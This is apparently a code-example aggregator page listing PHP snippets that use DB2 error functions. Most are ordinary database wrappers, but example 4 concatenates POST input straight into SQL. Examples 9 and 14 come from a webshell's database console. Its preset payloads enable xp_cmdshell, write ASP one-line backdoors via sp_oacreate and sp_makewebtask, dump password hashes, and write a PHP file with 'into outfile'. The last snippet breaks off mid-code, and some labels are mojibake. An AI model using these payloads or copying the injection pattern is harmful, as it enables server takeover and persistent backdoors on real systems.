Esempio n. 1
0
 function prepare($sql)
 {
     $stmt = @db2_prepare($this->_conn, $sql);
     if (!$stmt) {
         throw new DB2Exception(db2_stmt_errormsg());
     }
     return new DB2Statement($stmt);
 }
Esempio n. 2
0
 /**
  * This function initializes the class.
  *
  * @access public
  * @override
  * @param DB_Connection_Driver $connection  the connection to be used
  * @param string $sql                       the SQL statement to be queried
  * @param integer $mode                     the execution mode to be used
  * @throws Throwable_SQL_Exception          indicates that the query failed
  *
  * @see http://www.php.net/manual/en/function.db2-prepare.php
  * @see http://www.php.net/manual/en/function.db2-execute.php
  * @see http://www.php.net/manual/en/function.db2-stmt-error.php
  */
 public function __construct(DB_Connection_Driver $connection, $sql, $mode = NULL)
 {
     $resource = $connection->get_resource();
     $command = @db2_prepare($resource, $sql);
     if ($command === FALSE) {
         throw new Throwable_SQL_Exception('Message: Failed to query SQL statement. Reason: :reason', array(':reason' => @db2_conn_errormsg($resource)));
     }
     if (!@db2_execute($command)) {
         throw new Throwable_SQL_Exception('Message: Failed to query SQL statement. Reason: :reason', array(':reason' => @db2_stmt_errormsg($command)));
     }
     $this->command = $command;
     $this->record = FALSE;
 }
Esempio n. 3
0
function dbQuery($query, $show_errors = true, $all_results = true, $show_output = true)
{
    if ($show_errors) {
        error_reporting(E_ALL);
    } else {
        error_reporting(E_PARSE);
    }
    // Connect to the IBM DB2 database management system
    $link = db2_pconnect("testdb", "db2inst1", "testpass");
    if (!$link) {
        die(db2_conn_errormsg());
    }
    // Print results in HTML
    print "<html><body>\n";
    // Print SQL query to test sqlmap '--string' command line option
    //print "<b>SQL query:</b> " . $query . "<br>\n";
    // Perform SQL injection affected query
    $stmt = db2_prepare($link, $query);
    $result = db2_execute($stmt);
    if (!$result) {
        if ($show_errors) {
            print "<b>SQL error:</b> " . db2_stmt_errormsg($stmt) . "<br>\n";
        }
        exit(1);
    }
    if (!$show_output) {
        exit(1);
    }
    print "<b>SQL results:</b>\n";
    print "<table border=\"1\">\n";
    while ($line = db2_fetch_array($stmt)) {
        print "<tr>";
        foreach ($line as $col_value) {
            print "<td>" . $col_value . "</td>";
        }
        print "</tr>\n";
        if (!$all_results) {
            break;
        }
    }
    print "</table>\n";
    print "</body></html>";
}
Esempio n. 4
0
	<script src="js/jquery-1.11.3.min.js"></script>
</head>
<body>
			<?php 
//Connect to database
require_once "connect_db.php";
require_once "algorithm.php";
//Pull trait information from database
$songname = $_POST["name"];
$sql = "SELECT * FROM \"USER04893\" . \"Songs\" WHERE \"title\" = LCASE('" . $songname . "')";
$stmt = db2_exec($conn4, $sql);
$losongs;
$row;
//Fetches the list of similar songs
if (!$stmt) {
    echo "SQL Statement Failed" . db2_stmt_errormsg() . "";
    return;
} else {
    $row = db2_fetch_array($stmt);
    $top = getSongs($row);
    $losongs = $top;
}
?>
	<br>
	<center><img src="images/logo.png" height="300px" width="300px" /></center>
	<table>

		<tr>
			<td colspan="3">The song you searched for is: <?php 
echo ucwords($row[0]);
?>
Esempio n. 5
0
 if (!$result2) {
     echo "exec errormsg: " . db2_stmt_errormsg($stmt2);
     die("Failed Query");
 }
 $bid = db2_fetch_array($stmt2);
 if (!$bid) {
     continue;
     // NOT BIDDING  ITEM
 }
 // I BID
 // CHECK IF ENDED
 $sql2 = "SELECT HIGHEST_BID_AMOUNT, END_DATE, END_TIME, HIGHEST_BIDDER FROM " . $computerName . ".BIDS WHERE ITEM_ID = {$itemID} and CURRENT DATE >= END_DATE";
 $stmt2 = db2_prepare($conn, $sql2);
 $result2 = db2_execute($stmt2);
 if (!$result2) {
     echo "exec errormsg: " . db2_stmt_errormsg($stmt2);
     die("Failed Query");
 }
 $bid = db2_fetch_array($stmt2);
 if (!$bid) {
     continue;
 }
 $endTime = $bid[1] . ' ' . $bid[2];
 $curTime = date("Y-m-d H:i:s");
 if (strcmp($endTime, $curTime) > 0) {
     continue;
 }
 $endTime = $bid[1] . ' ' . $bid[2];
 $highestBid = $bid[0];
 $highestBidder = $bid[3];
 $condition = $row[3];
Esempio n. 6
0
File: Db2.php Progetto: netixx/Stock
 /**
  * Executes a prepared statement.
  *
  * @param array $params OPTIONAL Values to bind to parameter placeholders.
  * @return bool
  * @throws Zend_Db_Statement_Db2_Exception
  */
 public function _execute(array $params = null)
 {
     if (!$this->_stmt) {
         return false;
     }
     $retval = true;
     if ($params !== null) {
         $retval = @db2_execute($this->_stmt, $params);
     } else {
         $retval = @db2_execute($this->_stmt);
     }
     if ($retval === false) {
         /**
          * @see Zend_Db_Statement_Db2_Exception
          */
         require_once PHP_LIBRARY_PATH . 'Zend/Db/Statement/Db2/Exception.php';
         throw new Zend_Db_Statement_Db2_Exception(db2_stmt_errormsg(), db2_stmt_error());
     }
     $this->_keys = array();
     if ($field_num = $this->columnCount()) {
         for ($i = 0; $i < $field_num; $i++) {
             $name = db2_field_name($this->_stmt, $i);
             $this->_keys[] = $name;
         }
     }
     $this->_values = array();
     if ($this->_keys) {
         $this->_values = array_fill(0, count($this->_keys), null);
     }
     return $retval;
 }
Esempio n. 7
0
 function _query($sql, $inputarr = false)
 {
     global $php_errormsg;
     if (isset($php_errormsg)) {
         $php_errormsg = '';
     }
     $this->_error = '';
     if ($inputarr) {
         if (is_array($sql)) {
             $stmtid = $sql[1];
         } else {
             $stmtid = db2_prepare($this->_connectionID, $sql);
             if ($stmtid == false) {
                 $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : '';
                 return false;
             }
         }
         if (!db2_execute($stmtid, $inputarr)) {
             if ($this->_haserrorfunctions) {
                 $this->_errorMsg = db2_stmt_errormsg();
                 $this->_errorCode = db2_stmt_error();
             }
             return false;
         }
     } else {
         if (is_array($sql)) {
             $stmtid = $sql[1];
             if (!db2_execute($stmtid)) {
                 if ($this->_haserrorfunctions) {
                     $this->_errorMsg = db2_stmt_errormsg();
                     $this->_errorCode = db2_stmt_error();
                 }
                 return false;
             }
         } else {
             $stmtid = @db2_exec($this->_connectionID, $sql);
         }
     }
     $this->_lastAffectedRows = 0;
     if ($stmtid) {
         if (@db2_num_fields($stmtid) == 0) {
             $this->_lastAffectedRows = db2_num_rows($stmtid);
             $stmtid = true;
         } else {
             $this->_lastAffectedRows = 0;
         }
         if ($this->_haserrorfunctions) {
             $this->_errorMsg = '';
             $this->_errorCode = 0;
         } else {
             $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : '';
         }
     } else {
         if ($this->_haserrorfunctions) {
             $this->_errorMsg = db2_stmt_errormsg();
             $this->_errorCode = db2_stmt_error();
         } else {
             $this->_errorMsg = isset($php_errormsg) ? $php_errormsg : '';
         }
     }
     return $stmtid;
 }
Esempio n. 8
0
 protected function _rawQuery($sql)
 {
     $conn = $this->_db->getConnection();
     $result = @db2_exec($conn, $sql);
     if (!$result) {
         $e = db2_stmt_errormsg();
         throw new Db\Exception("SQL error for \"{$sql}\": {$e}");
     }
 }
Esempio n. 9
0
function otherdb()
{
    $db = isset($_GET['db']) ? $_GET['db'] : 'ms';
    print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data">
<div class="actall">
<a href="?s=gg&db=ms"> &nbsp MSSQL &nbsp</a>
<a href="?s=gg&db=ora"> &nbsp Oracle &nbsp</a>
<a href="?s=gg&db=ifx"> &nbsp InforMix &nbsp</a>
<a href="?s=gg&db=fb"> &nbsp  FireBird &nbsp</a>
<a href="?s=gg&db=db2">&nbsp DB2 &nbsp</a></div></form>
END;
    if ($db == "ms") {
        $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
        $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
        $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
        $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
        $msaction = isset($_POST['action']) ? $_POST['action'] : '';
        $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
        $msquery = stripslashes($msquery);
        print <<<END
<div class="actall">
<form method="POST" name="msform" action="?s=gg&db=ms">
Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
\tStr[0] = "";
\tStr[1] = "select @@version;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select name from sysobject where type='U';";
\tStr[4] = "select name from syscolumns where id=Object_Id('table_name');";
\tStr[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
\tStr[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
\tStr[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
\tStr[10] = "Exec master.dbo.xp_cmdshell 'net user';";
\tStr[11] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
\tmsform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
\t<option value="5">sp_oacreate</option>
\t<option value="6">xp_cmdshell</option>
\t<option value="7">xp_cmdshell(2005)</option>
\t<option value="8">sp_oacreate(2005)</option>
\t<option value="9">����openrowset(2005)</option>
\t<option value="10">xp_cmdshell exec</option>
\t<option value="10">sp_oamethod exec</option>
\t<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></form></div>
END;
        if ($msaction == 'msquery') {
            $msconn = mssql_connect($mshost, $msuser, $mspass);
            mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
            $msresult = mssql_query($msquery) or die(mssql_get_last_message());
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n";
            }
            echo "</tr>\n";
            mssql_data_seek($result, 0);
            while ($msrow = mssql_fetch_row($msresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                    echo '<td>' . "{$msrow[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            mssql_free_result($msresult);
            mssql_close();
        }
    } elseif ($db == "ora") {
        $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
        $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
        $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
        $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
        $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
        $oraaction = isset($_POST['action']) ? $_POST['action'] : '';
        $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
        $oraquery = stripslashes($oraquery);
        print <<<END
<form method="POST" name="oraform" action="?s=gg&db=ora">
<div class="actall">
Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>
<script language="javascript">
function oraFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select version();";
\tStr[2] = "SELECT NAME FROM V{$DATABASE}";
\tStr[3] = "select * From all_objects where object_type='TABLE'";
\tStr[4] = "select column_name from user_tab_columns where table_name='table1'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($oraaction == 'oraquery') {
            $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
            $oraresult = ociparse($oralink, $oraquery) or die(ocierror());
            $orarow = oci_fetch_row($oraresult);
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
                echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n";
            }
            echo "</tr>\n";
            ociresult($oraresult, 0);
            while ($orarow = ora_fetch_row($oraresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ora_num_fields($result); $i++) {
                    echo '<td>' . "{$orarow[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            oci_free_statement($oraresult);
            ocilogoff();
        }
    } elseif ($db == "ifx") {
        $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
        $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
        $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
        $ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
        $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
        $ifxquery = stripslashes($ifxquery);
        print <<<END
<form method="POST" name="ifxform" action="?s=gg&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>
<script language="javascript">
function ifxFull(i){
Str = new Array(11);
\tStr[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select tabname from systables;";
\tStr[4] = "select colname from syscolumns where tabid=n;";
\tStr[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�����������</option>
\t<option value="1">���ݿ�</option>
\t<option value="2">����</option>
\t<option value="3">�ֶ�</option>
\t<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($ifxaction == 'ifxquery') {
            $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
            $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
            $ifxrow = ifx_fetch_row($ifxresult);
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n";
            }
            echo "</tr>\n";
            mysql_data_seek($ifxresult, 0);
            while ($ifxrow = ifx_fetch_row($ifxresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                    echo '<td>' . "{$ifxrow[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            ifx_free_result($ifxresult);
            ifx_close();
        }
    } elseif ($db == "db2") {
        $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
        $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
        $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
        $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
        $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
        $db2action = isset($_POST['action']) ? $_POST['action'] : '';
        $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
        $db2query = stripslashes($db2query);
        print <<<END
<form method="POST" name="db2form" action="?s=gg&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>
<script language="javascript">
function db2Full(i){
Str = new Array(4);
\tStr[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
\tStr[2] = "select name from sysibm.systables;";
\tStr[3] = "select colname from syscat.columns where tabname='table_name';";
\tStr[4] = "db2 get db cfg for db_name;";
db2form.db2sql.value = Str[i];
return true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">���ݿ�����</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($myaction == 'db2query') {
            $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
            $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
            $db2row = db2_fetch_row($db2result);
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n";
            }
            echo "</tr>\n";
            while ($db2row = db2_fetch_row($db2result)) {
                echo "<tr>\n";
                for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                    echo '<td>' . "{$db2row[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            db2_free_result($db2result);
            db2_close();
        }
    } elseif ($db == "fb") {
        $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
        $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
        $fbpath = str_replace("\\\\", "\\", $fbpath);
        $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
        $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
        $fbaction = isset($_POST['action']) ? $_POST['action'] : '';
        $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
        $fbquery = stripslashes($fbquery);
        print <<<END
<form method="POST" name="fbform" action="?s=gg&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
\tStr[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
\tStr[3] = "input 'D:\\createtable.sql';";
\tStr[4] = "shell netstat -an;";
fbform.fbsql.value = Str[i];
return true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">����sql</option>
\t<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($fbaction == 'fbquery') {
            $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
            $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
            echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
            for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n";
            }
            echo "</tr>\n";
            ibase_field_info($fbresult, 0);
            while ($fbrow = ibase_fetch_row($fbresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                    echo '<td>' . "{$fbrow[$i]}" . '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table></font>";
            ibase_free_result($fbresult);
            ibase_close();
        }
    }
}
Esempio n. 10
0
File: Db2.php Progetto: hjr3/zf2
 /**
  * Executes a prepared statement.
  *
  * @param array $params OPTIONAL Values to bind to parameter placeholders.
  * @return bool
  * @throws \Zend\Db\Statement\Db2Exception
  */
 public function _execute(array $params = null)
 {
     if (!$this->_stmt) {
         return false;
     }
     $retval = true;
     if ($params !== null) {
         $retval = @db2_execute($this->_stmt, $params);
     } else {
         $retval = @db2_execute($this->_stmt);
     }
     if ($retval === false) {
         throw new Db2Exception(db2_stmt_errormsg(), db2_stmt_error());
     }
     $this->_keys = array();
     if ($field_num = $this->columnCount()) {
         for ($i = 0; $i < $field_num; $i++) {
             $name = db2_field_name($this->_stmt, $i);
             $this->_keys[] = $name;
         }
     }
     $this->_values = array();
     if ($this->_keys) {
         $this->_values = array_fill(0, count($this->_keys), null);
     }
     return $retval;
 }
Esempio n. 11
0
 /**
  * This function returns the last error string.
  *
  * @access  public
  * @author  Thorsten Rinne <*****@*****.**>
  * @since   2005-04-16
  */
 function error()
 {
     return db2_stmt_errormsg($this->conn);
 }
Esempio n. 12
0
 public static function errorMessage($conn)
 {
     return db2_stmt_errormsg();
 }
Esempio n. 13
0
 /**
  * error()
  *
  * This function returns the last error string.
  *
  * @access  public
  * @author  Thorsten Rinne <*****@*****.**>
  * @since   2005-04-16
  */
 function error()
 {
     return db2_stmt_errormsg();
 }
Esempio n. 14
0
function otherdb()
{
    $db = isset($_GET['db']) ? $_GET['db'] : '';
    print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=w&db={$db}" enctype="multipart/form-data">
<div class="actall"><a href="?s=w"> &nbsp psotgresql &nbsp</a> 
<a href="?s=w&db=ms"> &nbsp mssql &nbsp</a> 
<a href="?s=w&db=ora"> &nbsp oracle &nbsp</a>
<a href="?s=w&db=ifx"> &nbsp informix &nbsp</a>
<a href="?s=w&db=fb"> &nbsp  firebird &nbsp</a>
<a href="?s=w&db=db2">&nbsp db2 &nbsp</a></div></form>
END;
    if ($db == "ms") {
        $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
        $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
        $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '******';
        $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
        $msaction = isset($_POST['action']) ? $_POST['action'] : '';
        $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
        $msquery = stripslashes($msquery);
        print <<<END
<form method="POST" name="msform" action="?s=w&db=ms">
<div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
        Str[0] = "";
\tStr[1] = "select @@version;";
        Str[2] = "select name from sysdatabases;";
        Str[3] = "select name from sysobject where type='U';";
        Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
        Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
        Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
        Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
        Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
        Str[11] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
        msform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">add sp_oacreate</option>
\t<option value="6">add xp_cmdshell</option>
\t<option value="7">add xp_cmdshell(2005)</option>
        <option value="8">add sp_oacreate(2005)</option>
        <option value="9">open openrowset(2005)</option>
        <option value="10">xp_cmdshell exec</option>
        <option value="10">sp_oamethod exec</option>
        <option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($msaction == 'msquery') {
            $msconn = mssql_connect($mshost, $msuser, $mspass);
            mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
            $msresult = mssql_query($msquery) or die(mssql_get_last_message());
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . mssql_field_name($msresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            mssql_data_seek($result, 0);
            while ($msrow = mssql_fetch_row($msresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$msrow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            mssql_free_result($msresult);
            mssql_close();
        }
    } elseif ($db == "ora") {
        $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
        $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
        $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
        $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
        $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
        $oraaction = isset($_POST['action']) ? $_POST['action'] : '';
        $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
        $oraquery = stripslashes($oraquery);
        print <<<END
<form method="POST" name="oraform" action="?s=w&db=ora">
<div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br>
<script language="javascript">
function oraFull(i){
\tStr = new Array(8);
        Str[0] = ""; 
\tStr[1] = "select version();";
        Str[2] = "show databases;";
        Str[3] = "show tables from db_name;";
        Str[4] = "show columns from table_name;";
        Str[5] = "select user,password from mysql.user;";
\tStr[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);";
\tStr[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">hashes</option>
\t<option value="6">load_file</option>
\t<option value="7">into outfile</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($oraaction == 'oraquery') {
            $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
            $oraresult = ociparse($oralink, $oraquery) or die(ocierror());
            $orarow = oci_fetch_row($oraresult);
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . oci_field_name($oraresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            ociresult($oraresult, 0);
            while ($orarow = ora_fetch_row($oraresult)) {
                echo "<tr>\n";
